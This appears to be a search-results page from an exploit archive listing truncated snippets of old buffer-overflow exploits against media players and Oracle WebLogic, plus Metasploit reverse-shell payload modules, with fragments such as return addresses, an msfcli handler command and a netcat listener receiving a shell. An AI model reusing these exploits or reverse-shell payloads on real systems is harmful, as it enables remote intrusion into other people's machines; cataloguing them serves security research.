80 matches found
OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow
!/usr/bin/python OtsTurntables Free v1.00.047 .olf Universal Buffer Overflow Exploit Date: 14-01-2010 Author: mrme Software Link: http://www.otsturntables.com/download-otsturntables-free/ Version: 1.00.047 Tested on: Windows XP sp3 Greetz:...
Easy RM to MP3 2.7.3.700 - Local Buffer Overflow
!/usr/bin/python Exploit for against Easy RM to MP3 2.7.3.700 12.2.2009 Author: Ron Henry - [email protected] - dijital1 Version: Easy RM to MP3 2.7.3.700 Tested against WinXP SP3 - English outputfile = "astley.m3u" shellcode="A" 26071 Offset to EIP - Windows XP SP3 shellcode+="\x25\x96\xa0\x7c"...
Windows Command Shell, Reverse All-Port TCP Stager
Spawn a piped command shell staged. Try to connect back to the attacker, on all possible ports 1-65535, slowly This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 282 include...
SAP Player 0.9 Buffer Overflow
!/usr/bin/python SAP player 0.9 .pla Universal Local BoF Exploit SEH Download: http://www.sorinara.com/sap/sap09.exe Credits go to: PLATEN Coded by: Steven Seeley aka mrme Tested on Windows XP SP3 Its not dead till its buried ; windows/shell/reversetcp - 617 bytes stage 1 http://www.metasploit.co...
SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)
Exploit for unknown platform in category local exploits =================================================================== SAP Player 0.9 .pla Universal Local Buffer Overflow Exploit SEH =================================================================== !/usr/bin/python SAP player 0.9 .pla...
SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)
!/usr/bin/python SAP player 0.9 .pla Universal Local BoF Exploit SEH Download: http://www.sorinara.com/sap/sap09.exe Credits go to: PLATEN Coded by: Steven Seeley aka mrme Tested on Windows XP SP3 Its not dead till its buried ; windows/shell/reversetcp - 617 bytes stage 1 http://www.metasploit.co...
Media Jukebox 8 Buffer Overflow
!/usr/bin/python Media Jukebox 8 .pls Universal Local Buffer Exploit SEH Author: mrme Download: http://download.chip.eu/en/Media-Jukebox-8.0.40076134.html Note: we needed a header to trigger this one ; Tested on: Wind0ws XP and Vist@ Greetz: offensive-security, I tried harder : msf exploithandler...
Media Jukebox 8 - .pls Universal Local Buffer (SEH)
Media Jukebox 8 - .pls Universal Local Buffer SEH !/usr/bin/python Media Jukebox 8 .pls Universal Local Buffer Exploit SEH Author: mrme Download: http://download.chip.eu/en/Media-Jukebox-8.0.40076134.html Note: we needed a header to trigger this one ; Tested on: Wind0ws XP and Vist@ Greetz:...
Windows x64 Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell Windows x64 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 460 include Msf::Payload::Windows include Msf::Payload::Single includ...
Oracle WebLogic IIS connector JSESSIONID - Remote Overflow
!/usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2008-5457 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reversetcp LHOST=10.10.10.1 LPORT=80 E Please wait while we load the module tree...
fsfdt-overflow.txt
$ nc -l -p 4321 Microsoft Windows 2000 Version 5.00.2195 C Copyright 1985-2000 Microsoft Corp. E:\draft\fsd1110\windows ------------------------------------------- !/usr/bin/perl FSFDT remote exploit by weakatfraglab.at spawns reverse shell to 10.0.0.100:4321 tested against 'FSFDT Windows FSD Bet...
Apple iOS Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 152 include Msf::Payload::Single include Msf::Payload::Osx include...
Winamp 5.34 - .mp4 Code Execution
Winamp 5.34 - .mp4 Code Execution /\ Winamp = 5.34 .MP4 File Code Execution Winamp MP4's plugin fails to handle exceptional conditions, which can lead to code execution. However exploitation is hard, firstly because of the return address. This code exploits a call eax, and it might be complicated...
OS X Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 65 include Msf::Payload::Single include Msf::Payload::Osx include...
PHP Command, Double Reverse TCP Connection (via Perl)
Creates an interactive shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Payload::Php include...
Linux Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 68 include Msf::Payload::Single include Msf::Payload::Linux::X86::Prepends includ...
OS X Command Shell, Reverse TCP Stager
Spawn a command shell staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework ReverseTcp ---------- OSX reverse TCP stager. module MetasploitModule CachedSize = 100 include...
Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
Inject a DLL via a reflective loader. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 93 include Msf::Payload::Stager include Msf::Payload::Windows def...
Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
Spawn a piped command shell staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 93 include Msf::Payload::Stager include Msf::Payload::Windows def...
Windows Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 324 include Msf::Payload::Windows include Msf::Payload::Single include...